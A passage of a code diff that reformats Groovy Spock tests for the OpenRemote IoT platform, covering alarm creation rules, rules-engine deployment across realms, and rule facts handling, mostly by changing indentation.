-        !alarm.createdOn.isAfter(alarmClockNow)
-        alarm.acknowledgedOn == null
-        alarm.createdOn == alarm.lastModified
-        alarm.assigneeId == assigneeId
+    alarm.severity == severity
+    alarm.status == Alarm.Status.OPEN
+    alarm.source == Alarm.Source.REALM_RULESET
+    alarm.sourceId == Long.toString(realmRuleset.id)
+    alarm.createdOn.isAfter(alarmClockNow.minusSeconds(30))
+    !alarm.createdOn.isAfter(alarmClockNow)
+    alarm.acknowledgedOn == null
+    alarm.createdOn == alarm.lastModified
+    alarm.assigneeId == assigneeId
 
-        and: "the asset is linked to the alarm"
-        def assetLinks = null
-        conditions.eventually {
-            // The link is stored in its own transaction after the alarm, so it can still be missing once the alarm is
-            // readable
-            assetLinks = alarmService.getAssetLinks(alarm.id, managerTestSetup.realmBuildingName)
-            assert assetLinks.size() == 1
-        }
-        def linkClockNow = getInstantTimeOf(container)
-        def assetLink = assetLinks.get(0)
-        assetLink.id.alarmId == alarm.id
-        assetLink.id.realm == managerTestSetup.realmBuildingName
-        assetLink.id.assetId == managerTestSetup.apartment2LivingroomId
-        assetLink.createdOn.isAfter(linkClockNow.minusSeconds(30))
-        !assetLink.createdOn.isAfter(linkClockNow)
-        assetLink.assetName == "Living Room 2"
-        assetLink.parentAssetName == "Apartment 2"
+    and: "the asset is linked to the alarm"
+    def assetLinks = null
+    conditions.eventually {
+      // The link is stored in its own transaction after the alarm, so it can still be missing once the alarm is
+      // readable
+      assetLinks = alarmService.getAssetLinks(alarm.id, managerTestSetup.realmBuildingName)
+      assert assetLinks.size() == 1
+    }
+    def linkClockNow = getInstantTimeOf(container)
+    def assetLink = assetLinks.get(0)
+    assetLink.id.alarmId == alarm.id
+    assetLink.id.realm == managerTestSetup.realmBuildingName
+    assetLink.id.assetId == managerTestSetup.apartment2LivingroomId
+    assetLink.createdOn.isAfter(linkClockNow.minusSeconds(30))
+    !assetLink.createdOn.isAfter(linkClockNow)
+    assetLink.assetName == "Living Room 2"
+    assetLink.parentAssetName == "Apartment 2"
 
-        and: "the expected number e-mail notifications matches"
-        conditions.eventually {
-            notificationMessages.size() == emailNotifications
-        }
-
-        where:
-        severity              | assigneeId                    | emailNotifications
-        Alarm.Severity.LOW    | null                          | 0
-        Alarm.Severity.LOW    | keycloakTestSetup.testuser1Id | 0
-        Alarm.Severity.MEDIUM | null                          | 0
-        Alarm.Severity.MEDIUM | keycloakTestSetup.testuser2Id | 0
-        Alarm.Severity.HIGH   | null                          | 1
-        Alarm.Severity.HIGH   | keycloakTestSetup.testuser3Id | 1
-        Alarm.Severity.HIGH   | alarmsReadWriteUserId         | 1
+    and: "the expected number e-mail notifications matches"
+    conditions.eventually {
+      notificationMessages.size() == emailNotifications
     }
 
-    def "rule does not create alarm when rules service is restarted"() {
-        def realmRuleset = createAlarmRule(Alarm.Severity.HIGH, null)
+    where:
+    severity | assigneeId | emailNotifications
+    Alarm.Severity.LOW | null | 0
+    Alarm.Severity.LOW | keycloakTestSetup.testuser1Id | 0
+    Alarm.Severity.MEDIUM | null | 0
+    Alarm.Severity.MEDIUM | keycloakTestSetup.testuser2Id | 0
+    Alarm.Severity.HIGH | null | 1
+    Alarm.Severity.HIGH | keycloakTestSetup.testuser3Id | 1
+    Alarm.Severity.HIGH | alarmsReadWriteUserId | 1
+  }
 
-        when: "the room linked attribute is updated"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "co2Level", 6000))
+  def "rule does not create alarm when rules service is restarted"() {
+    def realmRuleset = createAlarmRule(Alarm.Severity.HIGH, null)
 
-        then: "the linked co2Level attribute should equal the event value"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        conditions.eventually {
-            def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
-            assert asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(null) == 6000
-        }
+    when: "the room linked attribute is updated"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "co2Level", 6000))
 
-        and: "one alarm is created"
-        conditions.eventually {
-            def alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
-            assert alarms.size() == 1
-        }
-
-        when: "the rules service is stopped"
-        rulesService.stop(container)
-
-        then: "the realm engine and rule is no longer deployed"
-        conditions.eventually {
-            assert !rulesService.realmEngines.containsKey(managerTestSetup.realmBuildingName)
-        }
-
-        and: "the linked co2Level attribute still equals the event value"
-        def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
-        asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(null) == 6000
-
-        when: "the rules service is started"
-        rulesService.start(container)
-
-        then: "the rule is deployed again"
-        conditions.eventually {
-            def deployment = rulesService.realmEngines.get(managerTestSetup.realmBuildingName).deployments.get(realmRuleset.id)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
-
-        and: "the number of created alarms remains the same"
-        def conditions2 = new PollingConditions(initialDelay: 5, timeout: 6, delay: 0.2)
-        conditions2.eventually {
-            def alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
-            assert alarms.size() == 1
-        }
+    then: "the linked co2Level attribute should equal the event value"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    conditions.eventually {
+      def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
+      assert asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(null) == 6000
     }
 
+    and: "one alarm is created"
+    conditions.eventually {
+      def alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
+      assert alarms.size() == 1
+    }
+
+    when: "the rules service is stopped"
+    rulesService.stop(container)
+
+    then: "the realm engine and rule is no longer deployed"
+    conditions.eventually {
+      assert !rulesService.realmEngines.containsKey(managerTestSetup.realmBuildingName)
+    }
+
+    and: "the linked co2Level attribute still equals the event value"
+    def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
+    asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(null) == 6000
+
+    when: "the rules service is started"
+    rulesService.start(container)
+
+    then: "the rule is deployed again"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(managerTestSetup.realmBuildingName).deployments.get(realmRuleset.id)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
+    }
+
+    and: "the number of created alarms remains the same"
+    def conditions2 = new PollingConditions(initialDelay: 5, timeout: 6, delay: 0.2)
+    conditions2.eventually {
+      def alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
+      assert alarms.size() == 1
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/BasicRulesDeploymentTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/BasicRulesDeploymentTest.groovy
@@ -41,251 +41,283 @@ import static org.openremote.model.rules.RulesetStatus.*
 
 class BasicRulesDeploymentTest extends Specification implements ManagerContainerTrait {
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check basic rules engine deployment"() {
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check basic rules engine deployment"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def identityService = container.getService(ManagerIdentityService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def identityService = container.getService(ManagerIdentityService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
 
-        and: "some test rulesets have been imported"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+    and: "some test rulesets have been imported"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
 
-        and: "an authenticated user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    and: "an authenticated user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
 
-        when: "a new global rule definition is added"
-        def ruleset = new GlobalRuleset(
-                "Some more global rules", GROOVY,
-                getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates2.groovy").text
-        )
-        rulesetStorageService.merge(ruleset)
+    when: "a new global rule definition is added"
+    def ruleset = new GlobalRuleset(
+            "Some more global rules", GROOVY,
+            getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates2.groovy").text
+            )
+    rulesetStorageService.merge(ruleset)
 
-        then: "the global rules engine should load this definition and restart successfully"
-        conditions.eventually {
-            assert rulesService.globalEngine.get() != null
-            assert rulesService.globalEngine.get().isRunning()
-            assert rulesService.globalEngine.get().deployments.size() == 2
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some global demo rules" && it.status == DEPLOYED})
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some more global rules" && it.status == DEPLOYED})
-        }
+    then: "the global rules engine should load this definition and restart successfully"
+    conditions.eventually {
+      assert rulesService.globalEngine.get() != null
+      assert rulesService.globalEngine.get().isRunning()
+      assert rulesService.globalEngine.get().deployments.size() == 2
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some global demo rules" && it.status == DEPLOYED
+      })
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some more global rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "a new realm rule definition is added to Building"
-        ruleset = new RealmRuleset(
+    when: "a new realm rule definition is added to Building"
+    ruleset = new RealmRuleset(
             keycloakTestSetup.realmBuilding.name,
             "Some more building realm rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates2.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        then: "Building rules engine should load this definition and restart successfully"
-        conditions.eventually {
-            def realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.deployments.size() == 2
-            assert realmBuildingEngine.deployments.values().any({ it.name == "Some building realm demo rules" && it.status == DEPLOYED})
-            assert realmBuildingEngine.deployments.values().any({ it.name == "Some more building realm rules" && it.status == DEPLOYED})
-        }
+    then: "Building rules engine should load this definition and restart successfully"
+    conditions.eventually {
+      def realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.deployments.size() == 2
+      assert realmBuildingEngine.deployments.values().any({
+        it.name == "Some building realm demo rules" && it.status == DEPLOYED
+      })
+      assert realmBuildingEngine.deployments.values().any({
+        it.name == "Some more building realm rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "a new realm rule definition is added to City"
-        ruleset = new RealmRuleset(
+    when: "a new realm rule definition is added to City"
+    ruleset = new RealmRuleset(
             keycloakTestSetup.realmCity.name,
             "Some more smartcity realm rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates2.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        then: "a realm rules engine should be created for City and load this definition and start successfully"
-        conditions.eventually {
-            def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
-            assert rulesService.realmEngines.size() == 3
-            assert realmCity != null
-            assert realmCity.isRunning()
-            assert realmCity.deployments.size() == 1
-            assert realmCity.deployments.values().any({ it.name == "Some more smartcity realm rules" && it.status == DEPLOYED})
-        }
+    then: "a realm rules engine should be created for City and load this definition and start successfully"
+    conditions.eventually {
+      def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
+      assert rulesService.realmEngines.size() == 3
+      assert realmCity != null
+      assert realmCity.isRunning()
+      assert realmCity.deployments.size() == 1
+      assert realmCity.deployments.values().any({
+        it.name == "Some more smartcity realm rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "the disabled rule definition for Realm B is enabled"
-        ruleset = rulesetStorageService.find(RealmRuleset.class, rulesImport.realmCityRulesetId)
-        ruleset.setEnabled(true)
-        rulesetStorageService.merge(ruleset)
+    when: "the disabled rule definition for Realm B is enabled"
+    ruleset = rulesetStorageService.find(RealmRuleset.class, rulesImport.realmCityRulesetId)
+    ruleset.setEnabled(true)
+    rulesetStorageService.merge(ruleset)
 
-        then: "City rule engine should load this definition and restart successfully"
-        conditions.eventually {
-            def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
-            assert rulesService.realmEngines.size() == 3
-            assert realmCity != null
-            assert realmCity.isRunning()
-            assert realmCity.deployments.size() == 2
-            assert realmCity.deployments.values().any({ it.name == "Some more smartcity realm rules" && it.status == DEPLOYED})
-            assert realmCity.deployments.values().any({ it.name == "Some smartcity realm demo rules" && it.status == DEPLOYED})
-        }
+    then: "City rule engine should load this definition and restart successfully"
+    conditions.eventually {
+      def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
+      assert rulesService.realmEngines.size() == 3
+      assert realmCity != null
+      assert realmCity.isRunning()
+      assert realmCity.deployments.size() == 2
+      assert realmCity.deployments.values().any({
+        it.name == "Some more smartcity realm rules" && it.status == DEPLOYED
+      })
+      assert realmCity.deployments.values().any({
+        it.name == "Some smartcity realm demo rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "the enabled rule definition for City is disabled"
-        // TODO: Stop instances of rule definitions being passed around as rules engine nulls the rules property
-        ruleset = rulesetStorageService.find(RealmRuleset.class, rulesImport.realmCityRulesetId)
-        ruleset.setEnabled(false)
-        rulesetStorageService.merge(ruleset)
+    when: "the enabled rule definition for City is disabled"
+    // TODO: Stop instances of rule definitions being passed around as rules engine nulls the rules property
+    ruleset = rulesetStorageService.find(RealmRuleset.class, rulesImport.realmCityRulesetId)
+    ruleset.setEnabled(false)
+    rulesetStorageService.merge(ruleset)
 
-        then: "City rule engine should remove it again"
-        conditions.eventually {
-            def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
-            assert realmCity != null
-            assert realmCity.isRunning()
-            assert realmCity.deployments.size() == 1
-            assert realmCity.deployments.values().any({ it.name == "Some more smartcity realm rules" && it.status == DEPLOYED})
-        }
+    then: "City rule engine should remove it again"
+    conditions.eventually {
+      def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
+      assert realmCity != null
+      assert realmCity.isRunning()
+      assert realmCity.deployments.size() == 1
+      assert realmCity.deployments.values().any({
+        it.name == "Some more smartcity realm rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "the asset rule definition for apartment 2 is deleted"
-        rulesetStorageService.delete(AssetRuleset.class, rulesImport.apartment2RulesetId)
+    when: "the asset rule definition for apartment 2 is deleted"
+    rulesetStorageService.delete(AssetRuleset.class, rulesImport.apartment2RulesetId)
 
-        then: "the apartment rules engine should be removed"
-        conditions.eventually {
-            assert rulesService.assetEngines.size() == 1
-            def apartment2Engine = rulesService.assetEngines.get(managerTestSetup.apartment2Id)
-            def apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
-            assert apartment2Engine == null
-            assert apartment3Engine != null
-            assert apartment3Engine.isRunning()
-        }
+    then: "the apartment rules engine should be removed"
+    conditions.eventually {
+      assert rulesService.assetEngines.size() == 1
+      def apartment2Engine = rulesService.assetEngines.get(managerTestSetup.apartment2Id)
+      def apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
+      assert apartment2Engine == null
+      assert apartment3Engine != null
+      assert apartment3Engine.isRunning()
+    }
 
-        when: "a broken rule definition is added to the global rules engine"
-        ruleset = new GlobalRuleset(
-                "Some broken global rules", GROOVY,
-                getClass().getResource("/org/openremote/test/rules/BasicBrokenRules.groovy").text
-        )
-        ruleset = rulesetStorageService.merge(ruleset)
+    when: "a broken rule definition is added to the global rules engine"
+    ruleset = new GlobalRuleset(
+            "Some broken global rules", GROOVY,
+            getClass().getResource("/org/openremote/test/rules/BasicBrokenRules.groovy").text
+            )
+    ruleset = rulesetStorageService.merge(ruleset)
 
-        then: "the global rules engine should still run and the rule engine status should indicate the issue"
-        conditions.eventually {
-            assert rulesService.globalEngine.get().deployments.size() == 3
-            assert rulesService.globalEngine.get().running
-            assert !rulesService.globalEngine.get().isError()
-            assert rulesService.globalEngine.get().getError() instanceof RuntimeException
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some global demo rules" && it.status == DEPLOYED})
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some more global rules" && it.status == DEPLOYED})
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some broken global rules" && it.status == COMPILATION_ERROR})
-        }
+    then: "the global rules engine should still run and the rule engine status should indicate the issue"
+    conditions.eventually {
+      assert rulesService.globalEngine.get().deployments.size() == 3
+      assert rulesService.globalEngine.get().running
+      assert !rulesService.globalEngine.get().isError()
+      assert rulesService.globalEngine.get().getError() instanceof RuntimeException
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some global demo rules" && it.status == DEPLOYED
+      })
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some more global rules" && it.status == DEPLOYED
+      })
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some broken global rules" && it.status == COMPILATION_ERROR
+      })
+    }
 
-        when: "the broken rule definition is removed from the global engine"
-        rulesetStorageService.delete(GlobalRuleset.class, ruleset.getId())
+    when: "the broken rule definition is removed from the global engine"
+    rulesetStorageService.delete(GlobalRuleset.class, ruleset.getId())
 
-        then: "the global rules engine should restart"
-        conditions.eventually {
-            assert rulesService.globalEngine.get().deployments.size() == 2
-            assert rulesService.globalEngine.get().running
-            assert !rulesService.globalEngine.get().isError()
-            assert rulesService.globalEngine.get().getError() == null
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some global demo rules" && it.status == DEPLOYED })
-            assert rulesService.globalEngine.get().deployments.values().any({ it.name == "Some more global rules" && it.status == DEPLOYED })
-        }
+    then: "the global rules engine should restart"
+    conditions.eventually {
+      assert rulesService.globalEngine.get().deployments.size() == 2
+      assert rulesService.globalEngine.get().running
+      assert !rulesService.globalEngine.get().isError()
+      assert rulesService.globalEngine.get().getError() == null
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some global demo rules" && it.status == DEPLOYED
+      })
+      assert rulesService.globalEngine.get().deployments.values().any({
+        it.name == "Some more global rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "a realm is disabled"
-        RulesEngine realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-        RulesEngine apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
-        def realmBuilding = keycloakTestSetup.realmBuilding
-        realmBuilding.setEnabled(false)
-        identityService.getIdentityProvider().updateRealm(realmBuilding)
+    when: "a realm is disabled"
+    RulesEngine realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+    RulesEngine apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
+    def realmBuilding = keycloakTestSetup.realmBuilding
+    realmBuilding.setEnabled(false)
+    identityService.getIdentityProvider().updateRealm(realmBuilding)
 
-        then: "the realms rule engine should stop and all asset rule engines in this realm should also stop"
-        conditions.eventually {
-            assert !realmBuildingEngine.isRunning()
-            assert rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name) == null
-            assert !apartment3Engine.isRunning()
-            assert rulesService.assetEngines.get(managerTestSetup.apartment3Id) == null
-        }
+    then: "the realms rule engine should stop and all asset rule engines in this realm should also stop"
+    conditions.eventually {
+      assert !realmBuildingEngine.isRunning()
+      assert rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name) == null
+      assert !apartment3Engine.isRunning()
+      assert rulesService.assetEngines.get(managerTestSetup.apartment3Id) == null
+    }
 
-        and: "other rule engines should be unaffected"
-        conditions.eventually {
-            assert rulesService.realmEngines.size() == 2
-            assert rulesService.assetEngines.size() == 0
-            def masterEngine = rulesService.realmEngines.get(keycloakTestSetup.realmMaster.name)
-            def cityEngine = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
-            assert masterEngine != null
-            assert masterEngine.isRunning()
-            assert cityEngine != null
-            assert cityEngine.isRunning()
-        }
+    and: "other rule engines should be unaffected"
+    conditions.eventually {
+      assert rulesService.realmEngines.size() == 2
+      assert rulesService.assetEngines.size() == 0
+      def masterEngine = rulesService.realmEngines.get(keycloakTestSetup.realmMaster.name)
+      def cityEngine = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
+      assert masterEngine != null
+      assert masterEngine.isRunning()
+      assert cityEngine != null
+      assert cityEngine.isRunning()
+    }
 
-        when: "the disabled realm is re-enabled"
-        realmBuilding.setEnabled(true)
-        identityService.getIdentityProvider().updateRealm(realmBuilding)
+    when: "the disabled realm is re-enabled"
+    realmBuilding.setEnabled(true)
+    identityService.getIdentityProvider().updateRealm(realmBuilding)
 
-        then: "the realms rule engine should start and all asset rule engines from this realm should also start"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
-            assert rulesService.realmEngines.size() == 3
-            assert rulesService.assetEngines.size() == 1
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.deployments.size() == 2
-            assert realmBuildingEngine.deployments.values().any({ it.name == "Some building realm demo rules" && it.status == DEPLOYED})
-            assert realmBuildingEngine.deployments.values().any({ it.name == "Some more building realm rules" && it.status == DEPLOYED})
-            assert apartment3Engine.deployments.size() == 1
-            assert apartment3Engine.deployments.values().any({ it.name == "Some apartment 3 demo rules" && it.status == DEPLOYED})
-        }
+    then: "the realms rule engine should start and all asset rule engines from this realm should also start"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
+      assert rulesService.realmEngines.size() == 3
+      assert rulesService.assetEngines.size() == 1
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.deployments.size() == 2
+      assert realmBuildingEngine.deployments.values().any({
+        it.name == "Some building realm demo rules" && it.status == DEPLOYED
+      })
+      assert realmBuildingEngine.deployments.values().any({
+        it.name == "Some more building realm rules" && it.status == DEPLOYED
+      })
+      assert apartment3Engine.deployments.size() == 1
+      assert apartment3Engine.deployments.values().any({
+        it.name == "Some apartment 3 demo rules" && it.status == DEPLOYED
+      })
+    }
 
-        when: "a new realm rule definition is added to Building"
-        ruleset = new RealmRuleset(
+    when: "a new realm rule definition is added to Building"
+    ruleset = new RealmRuleset(
             keycloakTestSetup.realmBuilding.name,
             "Throw Failure Exception",
             GROOVY,
             getClass().getResource("/org/openremote/test/failure/RulesFailureActionThrowsException.groovy").text)
             .setContinueOnError(true)
-        ruleset = rulesetStorageService.merge(ruleset)
+    ruleset = rulesetStorageService.merge(ruleset)
 
-        then: "the realms A rule engine should run with one deployment as error"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.deployments.size() == 3
-            assert realmBuildingEngine.deployments[ruleset.id].status == DEPLOYED
-            assert realmBuildingEngine.deployments[ruleset.id].error != null
-            assert !realmBuildingEngine.isError()
-        }
-
-        when: "a realm is deleted"
-        identityService.getIdentityProvider().deleteRealm(realmBuilding.getName())
-
-        then: "the realms rule engine should stop and all asset rule engines in this realm should also stop"
-        conditions.eventually {
-            assert rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name) == null
-            assert !realmBuildingEngine.isRunning()
-            assert rulesService.assetEngines.get(managerTestSetup.apartment3Id) == null
-            assert !apartment3Engine.isRunning()
-        }
-
-        and: "other rule engines should be unaffected"
-        conditions.eventually {
-            assert rulesService.realmEngines.size() == 2
-            assert rulesService.assetEngines.size() == 0
-            def masterEngine = rulesService.realmEngines.get(MASTER_REALM)
-            def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
-            assert masterEngine != null
-            assert masterEngine.isRunning()
-            assert realmCity != null
-            assert realmCity.isRunning()
-        }
+    then: "the realms A rule engine should run with one deployment as error"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.deployments.size() == 3
+      assert realmBuildingEngine.deployments[ruleset.id].status == DEPLOYED
+      assert realmBuildingEngine.deployments[ruleset.id].error != null
+      assert !realmBuildingEngine.isError()
     }
+
+    when: "a realm is deleted"
+    identityService.getIdentityProvider().deleteRealm(realmBuilding.getName())
+
+    then: "the realms rule engine should stop and all asset rule engines in this realm should also stop"
+    conditions.eventually {
+      assert rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name) == null
+      assert !realmBuildingEngine.isRunning()
+      assert rulesService.assetEngines.get(managerTestSetup.apartment3Id) == null
+      assert !apartment3Engine.isRunning()
+    }
+
+    and: "other rule engines should be unaffected"
+    conditions.eventually {
+      assert rulesService.realmEngines.size() == 2
+      assert rulesService.assetEngines.size() == 0
+      def masterEngine = rulesService.realmEngines.get(MASTER_REALM)
+      def realmCity = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
+      assert masterEngine != null
+      assert masterEngine.isRunning()
+      assert realmCity != null
+      assert realmCity.isRunning()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/BasicRulesFactsTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/BasicRulesFactsTest.groovy
@@ -32,373 +32,373 @@ import java.util.stream.Collectors
 
 class BasicRulesFactsTest extends Specification {
 
-    @ToString(includeNames = true)
-    class AnonFact {
-        String foo
-        double bar
-        boolean baz
+  @ToString(includeNames = true)
+  class AnonFact {
+    String foo
+    double bar
+    boolean baz
 
-        AnonFact(String foo, double bar, boolean baz) {
-            this.foo = foo
-            this.bar = bar
-            this.baz = baz
-        }
+    AnonFact(String foo, double bar, boolean baz) {
+      this.foo = foo
+      this.bar = bar
+      this.baz = baz
     }
+  }
 
-    @EqualsAndHashCode(includes = "id")
-    @ToString(includeNames = true)
-    class AnonFactWithId {
-        String id
-        String foo
+  @EqualsAndHashCode(includes = "id")
+  @ToString(includeNames = true)
+  class AnonFactWithId {
+    String id
+    String foo
 
-        AnonFactWithId(String id, String foo) {
-            this.id = id
-            this.foo = foo
-        }
+    AnonFactWithId(String id, String foo) {
+      this.id = id
+      this.foo = foo
     }
+  }
 
-    def assetsFacade
-    RulesFacts rulesFacts
-    TimerService timerService
+  def assetsFacade
+  RulesFacts rulesFacts
+  TimerService timerService
 
-    def setup() {
-        given: "some rule facts"
-        assetsFacade = Mock(AssetsFacade)
-        timerService = new TimerService()
-        def assetStorageService = new AssetStorageService()
-        timerService.clock = TimerService.Clock.PSEUDO
-        timerService.clock.stop()
-        rulesFacts = new RulesFacts(timerService, assetStorageService, assetsFacade, this, RulesService.LOG)
-    }
+  def setup() {
+    given: "some rule facts"
+    assetsFacade = Mock(AssetsFacade)
+    timerService = new TimerService()
+    def assetStorageService = new AssetStorageService()
+    timerService.clock = TimerService.Clock.PSEUDO
+    timerService.clock.stop()
+    rulesFacts = new RulesFacts(timerService, assetStorageService, assetsFacade, this, RulesService.LOG)
+  }
 
-    def "Handle named facts"() {
+  def "Handle named facts"() {
 
-        when: "a fact is added with reserved name"
-        rulesFacts.put(RulesFacts.ASSET_STATES, "FOO")
+    when: "a fact is added with reserved name"
+    rulesFacts.put(RulesFacts.ASSET_STATES, "FOO")
 
-        then: "it should not be allowed"
-        IllegalArgumentException ex = thrown()
-        assert ex
+    then: "it should not be allowed"
+    IllegalArgumentException ex = thrown()
+    assert ex
 
-        when: "some named facts are added"
-        rulesFacts.put("foo", "FOO")
-        rulesFacts.put("bar", "BAR")
-        rulesFacts.put("baz", ["BAZ111", "BAZ111", "BAZ222"])
+    when: "some named facts are added"
+    rulesFacts.put("foo", "FOO")
+    rulesFacts.put("bar", "BAR")
+    rulesFacts.put("baz", ["BAZ111", "BAZ111", "BAZ222"])
 
-        then: "facts should be present"
-        assert rulesFacts.allFacts.count() == 3
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 3
-        assert rulesFacts.anonymousFacts.size() == 0
